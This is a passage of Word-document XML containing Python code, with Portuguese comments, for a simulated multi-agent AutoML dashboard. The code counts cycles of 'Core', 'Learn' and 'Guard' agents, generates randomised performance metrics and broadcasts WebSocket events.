    <w:p w14:paraId="668033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self.guard_checks = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F45C3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self.cycle_history = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127BD9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self.performance_timeline = []  # Para gráfico empilhado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345716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 = logging.getLogger('cycle_counter')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1373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self.event_system = event_system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614296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29910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add_core_cycle(self, performance_data: Dict):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550E73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"""Adiciona um ciclo do Core Agent"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268316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self.core_cycles += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0EBB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self.total_cycles += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6637F4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self._log_cycle('CORE', self.core_cycles, performance_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6C2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78CB1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Adicionar ao timeline para gráfico empilhado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C0D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self.performance_timeline.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E296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'timestamp': datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DABB8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'agent': 'core',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE01A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'value': performance_data.get('performance', 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F2C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'cumulative_cycles': self.core_cycles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A91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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D56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09004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add_learn_cycle(self, performance_data: Dict):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300371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"""Adiciona um ciclo do Learn Agent"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F23F5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self.learn_cycles += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7182F2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self.total_cycles += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AEF3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self._log_cycle('LEARN', self.learn_cycles, performance_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB9FC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30AB9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self.performance_timeline.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6869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'timestamp': datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B582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'agent': 'learn',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035D00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'value': performance_data.get('performance', 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1EC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'cumulative_cycles': self.learn_cycles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5910EA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FB92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6312D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add_guard_check(self, security_data: Dict):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A55C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"""Adiciona uma verificação do Guard Agent"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE67B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self.guard_checks += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E11DD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self.total_cycles += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5DD1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self._log_cycle('GUARD', self.guard_checks, security_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003AD5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C0BF4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self.performance_timeline.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D22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'timestamp': datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A05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'agent': 'guard',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E9EA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'value': security_data.get('uptime', 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3C0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'cumulative_cycles': self.guard_checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246B52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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44398B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EAAC3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_log_cycle(self, agent_type: str, cycle_num: int, data: Dict):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2813A4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"""Log do ciclo executado + Evento WebSocket"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA58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timestamp = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6605DF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A51EA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Histórico tradicional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A495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self.cycle_history.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD12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'timestamp': timestamp.isoformat(),  # CORREÇÃO: Converter para string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B9E4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'agent': agent_type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74736B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'cycle_number': cycle_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF8FF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'total_cycles': self.total_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D73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'data': data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9F7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951E5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5E4CC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Manter apenas últimos 1000 registros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657318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len(self.cycle_history) &gt; 1000:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6CCF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self.cycle_history = self.cycle_history[-1000:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686FCB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3E647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Log tradicional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544474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🔥</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CICLO #{self.total_cycles} - {agent_type} #{cycle_num}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D75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DDB43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EVENTO WEBSOCKET - TEMPO REAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC76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event_icons = {'CORE': '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🤖</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>', 'LEARN': '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>', 'GUARD': '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0CC9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event_colors = {'CORE': '#FF6B6B', 'LEARN': '#9333EA', 'GUARD': '#00F5FF'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419625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81F8C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event = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D58F1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'type': 'cycle_completed',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4847D9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'agent': agent_type.lower(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075D36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'icon': event_icons.get(agent_type, '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>'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF0B6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'color': event_colors.get(agent_type, '#00F5FF'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36902B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'message': f"{agent_type} Agent completou ciclo #{cycle_num}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DB1B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'details': data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C612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'total_cycles': self.total_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B774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'timestamp': timestamp.strftime('%H:%M:%S')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF0A2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6851C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B9962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self.event_system.broadcast_event(event)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266D11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14FA6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get_uptime(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A437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"""Calcula uptime do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E273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uptime_delta = datetime.now() - self.start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4763AF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days = uptime_delta.days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564457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hours, remainder = divmod(uptime_delta.seconds, 3600)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0F6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minutes, _ = divmod(remainder, 60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6981B3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{'days': days, 'hours': hours, 'minutes': minutes}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCB7A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2C29B6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get_cycles_per_second(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574A9A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"""Calcula ciclos por segundo"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6416DA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uptime_seconds = (datetime.now() - self.start_time).total_seconds()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD0A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uptime_seconds &gt; 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640D58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round(self.total_cycles / uptime_seconds, 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19C6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0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD4A8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B42D6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get_timeline_data(self, hours: int = 24):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CB9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dados para gráfico empilhado"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C346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cutoff = datetime.now() - timedelta(hours=hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527046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recent_data = [item for item in self.performance_timeline if item['timestamp'] &gt; cutoff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383BD4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A4328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Agrupar por hora para visualização</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84FD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timeline = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FE4B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item in recent_data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73912D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hour_key = item['timestamp'].strftime('%H:%M')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238A64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hour_key not in timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F36ED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timeline[hour_key] = {'core': 0, 'learn': 0, 'guard': 0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49351C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timeline[hour_key][item['agent']] = item['cumulative_cycles']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1585F1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E8863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timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C0E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DCAF5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get_stats(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4A69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estatísticas completas"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF62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uptime = self.get_uptime()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043AFE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663A47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'total_cycles': self.total_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E18B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'core_cycles': self.core_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAD68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'learn_cycles': self.learn_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068343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'guard_checks': self.guard_checks,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BF3A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'uptime': uptime,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674210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'cycles_per_second': self.get_cycles_per_second(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C90D3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'start_time': self.start_time.isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1583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'last_cycle': self.cycle_history[-1] if self.cycle_history else None,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536DC4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'timeline_data': self.get_timeline_data()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C61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CD71FA3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E579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Instâncias globais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157889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event_system = EventSystem()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2FB1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cycle_counter = CycleCounter(event_system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC54177" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166D68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CoreAgent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E47CF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"""Core Agent: Auto-melhoria e processamento principal - VERSÃO 10/10"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EE81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FF5E4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674D91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self.agent_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C9F5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 = logging.getLogger('core_agent')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCFB0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self.performance_history = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB84F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self.detailed_history = []  # Para drill-down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D3BB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self.current_performance = 0.7500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC6C9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self.trials_completed = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281FC1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self.last_improvement = 0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6540A7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self.cycle_count = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C778E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self.accelerated_mode = ACCELERATED_MODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A9AA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self.running = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EC18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self.optimization_techniques = ['AutoML', 'Neural Architecture Search', 'Hyperparameter Tuning', 'Feature Engineering']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A02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DDF46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initialize(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59944F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"""Inicializa o Core Agent com modo acelerado"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B692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🤖</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Core Agent inicializado - ID: {self.agent_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C28F7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self.accelerated_mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB4F0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self.logger.info(f"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MODO ACELERADO: Ciclos autom</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ticos a cada {CORE_CYCLE_INTERVAL//60} minutos")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A809B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asyncio.create_task(self._run_accelerated_cycles())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D647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16FF9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_run_accelerated_cycles(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD351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"""Executa ciclos automáticos de evolução"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DA92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self.running = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444586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while self.running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A50EA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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5022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await self.run_automl_cycle()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B90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await asyncio.sleep(CORE_CYCLE_INTERVAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061CD6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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4AEF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self.logger.error(f"Erro no ciclo acelerado: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CD4D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await asyncio.sleep(60)  # Retry em 1 minuto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B9F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BA517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run_automl_cycle(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378865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"""Executa um ciclo de AutoML aprimorado - VERSÃO 10/10"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069FAD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self.cycle_count += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD20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C355B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🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando ciclo #{self.cycle_count} de evolução AutoML ACELERADO")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F56E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3A4E3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Simular processo de otimização mais detalhado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B101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technique_used = random.choice(self.optimization_techniques)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C840D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asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F948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65819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Calcular nova performance com bonus de aceleração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE88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old_performance = self.current_performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A46D4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improvement_factor = 0.05 + (random.random() * 0.15)  # 5-20% de melhoria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5CF5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B427C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Bonus de aceleração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A293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acceleration_bonus = 0.02 if self.accelerated_mode else 0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6811D3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improvement_factor += acceleration_bonus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDF24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17FF4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self.current_performance = min(0.99, old_performance * (1 + improvement_factor))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D51A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self.last_improvement = ((self.current_performance - old_performance) / old_performance) * 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E727E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self.trials_completed += random.randint(1, 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49752F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FA8E1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Dados detalhados para drill-down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCDBC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cycle_detail = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC4AC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'cycle_id': self.cycle_count,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432BC0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'timestamp': datetime.now().isoformat(),  # CORREÇÃO: Converter para string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007BD0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'technique': technique_used,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F63E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'old_performance': old_performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B876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'new_performance': self.current_performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A643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'improvement_percent': self.last_improvement,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797D72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'trials_this_cycle': random.randint(1, 3),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F6C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'processing_time': random.uniform(1.5, 3.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054663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'memory_usage': random.uniform(60, 85),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7851F2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'cpu_usage': random.uniform(40, 70)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADFC5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59B6F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711E8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self.detailed_history.append(cycle_detail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351736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6907C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Armazenar histórico tradicional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001244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self.performance_history.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DEDB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'timestamp': datetime.now().isoformat(),  # CORREÇÃO: Converter para string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA529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'performance': self.current_performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3497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'improvement': self.last_improvement,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA862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'cycle': self.cycle_count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC989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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABAE9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F9BF9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Manter apenas últimos 100 registros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC88A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len(self.performance_history) &gt; 100:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616D65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self.performance_history = self.performance_history[-100:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2A0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len(self.detailed_history) &gt; 50:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775B44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self.detailed_history = self.detailed_history[-50:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355DB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FDE73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</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏆</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ADICIONAR AO CONTADOR COM DADOS DETALHADOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6404FD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cycle_counter.add_core_cycle({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86F0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'performance': self.current_performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA60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'improvement': self.last_improvement,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F06C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'technique': technique_used,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297283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'trials': cycle_detail['trials_this_cycle']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292572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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAC46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81AD5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📈</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Performance: {old_performance:.4f} → {self.current_performance:.4f}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58871A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📈</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Melhoria: {self.last_improvement:.2f}% usando {technique_used}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5219A5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Ciclo #{self.cycle_count} ACELERADO conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEADA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8C48D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get_metrics(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E26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métricas do Core Agent"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D19B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6F39BC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'agent_id': self.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151090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'performance': self.current_performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795D2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'improvement': self.last_improvement,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C8E8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'automl_cycles': self.cycle_count,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B809E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'trials': self.trials_completed,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10591A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'accelerated_mode': self.accelerated_mode,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B4C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'value': 550000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4E0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'last_technique': self.detailed_history[-1]['technique'] if self.detailed_history else 'AutoML'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6B4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AD343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5E104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get_detailed_metrics(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2475BD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métricas detalhadas para drill-down"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F0B0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53BB76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'basic_metrics': self.get_metrics(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C85C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'detailed_history': self.detailed_history[-10:],  # Últimos 10 ciclos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76973A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'performance_trend': [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AD07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{'cycle': h['cycle'], 'performance': h['performance']} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631653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h in self.performance_history[-20:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A87D9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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4FE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'techniques_used': list(set([d['technique'] for d in self.detailed_history])),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB328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'avg_processing_time': sum([d['processing_time'] for d in self.detailed_history[-10:]]) / min(10, len(self.detailed_history)) if self.detailed_history else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301AAA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'system_resources': {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0FFA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'avg_memory': sum([d['memory_usage'] for d in self.detailed_history[-5:]]) / min(5, len(self.detailed_history)) if self.detailed_history else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220682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'avg_cpu': sum([d['cpu_usage'] for d in self.detailed_history[-5:]]) / min(5, len(self.detailed_history)) if self.detailed_history else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED7F1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6D63BC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6429C51" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64739C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LearnAgent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4259FC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"""Learn Agent: Aprendizado auto-evolutivo - VERSÃO 10/10"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113BD1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ED548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1751E2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self.agent_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B72BC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 = logging.getLogger('learn_agent')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAEB6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 = 0.831</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E44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self.connection_status = "ATIVA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA61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self.training_cycles = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B355C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self.accuracy = 94.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A3E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self.accelerated_mode = ACCELERATED_MODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84FE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self.running = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B16C1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self.detailed_history = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430894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self.learning_models = ['Deep Neural Networks', 'Transformer', 'Reinforcement Learning', 'Meta-Learning']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B37A0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00390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initialize(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B921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"""Inicializa o Learn Agent"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704EC2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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Learn Agent inicializado - ID: {self.agent_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189A70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7C763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Simular conexão com GuardAgent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745D0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asyncio.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C658D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Conex</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ã</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
